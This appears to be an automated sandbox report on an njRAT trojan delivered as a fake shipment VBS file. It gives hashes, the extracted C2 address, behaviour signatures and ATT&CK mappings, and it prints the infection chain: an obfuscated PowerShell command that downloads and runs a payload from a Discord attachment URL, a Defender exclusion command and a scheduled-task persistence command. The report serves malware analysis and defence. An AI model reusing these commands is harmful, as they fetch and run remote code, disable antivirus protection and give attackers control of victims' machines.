njrat | 313bb9d87b5bbdc4cc164ee429b41bcac1605401e1c3e7fa8d1fa287277e3cce

General

Target

Shipment#45523666245.vbs
Size

15KB
MD5

b671f9ee1edb1e6f2911c22c4e6ebbaf
SHA1

6de6dfee5b87a8f52ce34bc0c9d147bc69faa04e
SHA256

313bb9d87b5bbdc4cc164ee429b41bcac1605401e1c3e7fa8d1fa287277e3cce
SHA512

15f4ed29c203cf9a2da50b5df6d898e79feb08cf9ddc0ab7c315eeab9038745743e5352dc2db5197c3bf3817d26590bf4adc21a91a68fd2dcd633e3712fa4832

Score

10^/10

njrat ------(meilller)------trojan

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

------(MEILLLER)------

C2

new.libya2020.com.ly:2020

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1352 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

update.exeupdate.exe

pid process

1796 update.exe
1736 update.exe
Drops startup file 1 IoCs

Processes:

update.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk update.exe
Loads dropped DLL 1 IoCs

Processes:

update.exe

pid process

1796 update.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

update.exe

description pid process target process

PID 1796 set thread context of 1736 1796 update.exe update.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1868 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1352 powershell.exe
1352 powershell.exe
1352 powershell.exe
988 powershell.exe

flow	pid	process
5	1352	powershell.exe

pid	process
1796	update.exe
1736	update.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	update.exe

pid	process
1796	update.exe

description	pid	process	target process
PID 1796 set thread context of 1736	1796	update.exe	update.exe

pid	process
1868	schtasks.exe

pid	process
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
988	powershell.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

powershell.exepowershell.exeupdate.exe

description	pid	process
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	1736	update.exe
Token: 33	1736	update.exe
Token: SeIncBasePriorityPrivilege	1736	update.exe
Token: 33	1736	update.exe
Token: SeIncBasePriorityPrivilege	1736	update.exe
Token: 33	1736	update.exe
Token: SeIncBasePriorityPrivilege	1736	update.exe
Token: 33	1736	update.exe
Token: SeIncBasePriorityPrivilege	1736	update.exe
Token: 33	1736	update.exe
Token: SeIncBasePriorityPrivilege	1736	update.exe
Token: 33	1736	update.exe
Token: SeIncBasePriorityPrivilege	1736	update.exe
Token: 33	1736	update.exe
Token: SeIncBasePriorityPrivilege	1736	update.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

WScript.exepowershell.exeupdate.exe

description	pid	process	target process
PID 1032 wrote to memory of 1352	1032	WScript.exe	powershell.exe
PID 1032 wrote to memory of 1352	1032	WScript.exe	powershell.exe
PID 1032 wrote to memory of 1352	1032	WScript.exe	powershell.exe
PID 1352 wrote to memory of 1796	1352	powershell.exe	update.exe
PID 1352 wrote to memory of 1796	1352	powershell.exe	update.exe
PID 1352 wrote to memory of 1796	1352	powershell.exe	update.exe
PID 1352 wrote to memory of 1796	1352	powershell.exe	update.exe
PID 1352 wrote to memory of 1796	1352	powershell.exe	update.exe
PID 1352 wrote to memory of 1796	1352	powershell.exe	update.exe
PID 1352 wrote to memory of 1796	1352	powershell.exe	update.exe
PID 1796 wrote to memory of 988	1796	update.exe	powershell.exe
PID 1796 wrote to memory of 988	1796	update.exe	powershell.exe
PID 1796 wrote to memory of 988	1796	update.exe	powershell.exe
PID 1796 wrote to memory of 988	1796	update.exe	powershell.exe
PID 1796 wrote to memory of 1868	1796	update.exe	schtasks.exe
PID 1796 wrote to memory of 1868	1796	update.exe	schtasks.exe
PID 1796 wrote to memory of 1868	1796	update.exe	schtasks.exe
PID 1796 wrote to memory of 1868	1796	update.exe	schtasks.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe
PID 1796 wrote to memory of 1736	1796	update.exe	update.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipment#45523666245.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/903219380505169933/903220062633209916/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352

C:\Users\Public\update.exe
"C:\Users\Public\update.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\update.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrAhvaHxqGKf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD73C.tmp"
4⤵
- Creates scheduled task(s)
PID:1868

C:\Users\Public\update.exe
"C:\Users\Public\update.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:1736

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\update.exe
MD5
7059d3f5185128394432baaaa44ee4ea

SHA1
462dbc0838cb721cfb99ce505a30b0c32237e5ba

SHA256
cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

SHA512
d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

Download Submit
C:\Users\Public\update.exe
MD5
7059d3f5185128394432baaaa44ee4ea

SHA1
462dbc0838cb721cfb99ce505a30b0c32237e5ba

SHA256
cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

SHA512
d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

Download Submit
C:\Users\Public\update.exe
MD5
7059d3f5185128394432baaaa44ee4ea

SHA1
462dbc0838cb721cfb99ce505a30b0c32237e5ba

SHA256
cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

SHA512
d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

Download Submit
\Users\Public\update.exe
MD5
7059d3f5185128394432baaaa44ee4ea

SHA1
462dbc0838cb721cfb99ce505a30b0c32237e5ba

SHA256
cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

SHA512
d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

Download Submit
memory/988-87-0x00000000025A0000-0x00000000031EA000-memory.dmp

Filesize
12.3MB

Download
memory/988-86-0x00000000025A0000-0x00000000031EA000-memory.dmp

Filesize
12.3MB

Download
memory/988-85-0x00000000025A0000-0x00000000031EA000-memory.dmp

Filesize
12.3MB

Download
memory/988-72-0x0000000076961000-0x0000000076963000-memory.dmp

Filesize
8KB

Download
memory/988-71-0x0000000000000000-mapping.dmp

Download
memory/1032-54-0x000007FEFC271000-0x000007FEFC273000-memory.dmp

Filesize
8KB

Download
memory/1352-62-0x000000000260B000-0x000000000262A000-memory.dmp

Filesize
124KB

Download
memory/1352-60-0x0000000002604000-0x0000000002607000-memory.dmp

Filesize
12KB

Download
memory/1352-55-0x0000000000000000-mapping.dmp

Download
memory/1352-58-0x0000000002600000-0x0000000002602000-memory.dmp

Filesize
8KB

Download
memory/1352-59-0x0000000002602000-0x0000000002604000-memory.dmp

Filesize
8KB

Download
memory/1352-57-0x000007FEF2C90000-0x000007FEF37ED000-memory.dmp

Filesize
11.4MB

Download
memory/1352-61-0x000000001B780000-0x000000001BA7F000-memory.dmp

Filesize
3.0MB

Download
memory/1736-76-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1736-82-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1736-79-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1736-78-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1736-88-0x0000000000660000-0x0000000000661000-memory.dmp

Filesize
4KB

Download
memory/1736-75-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1736-80-0x00000000004083AE-mapping.dmp

Download
memory/1736-77-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1796-63-0x0000000000000000-mapping.dmp

Download
memory/1796-70-0x0000000000A50000-0x0000000000A78000-memory.dmp

Filesize
160KB

Download
memory/1796-69-0x00000000007B0000-0x00000000007B6000-memory.dmp

Filesize
24KB

Download
memory/1796-68-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download
memory/1796-66-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/1868-73-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads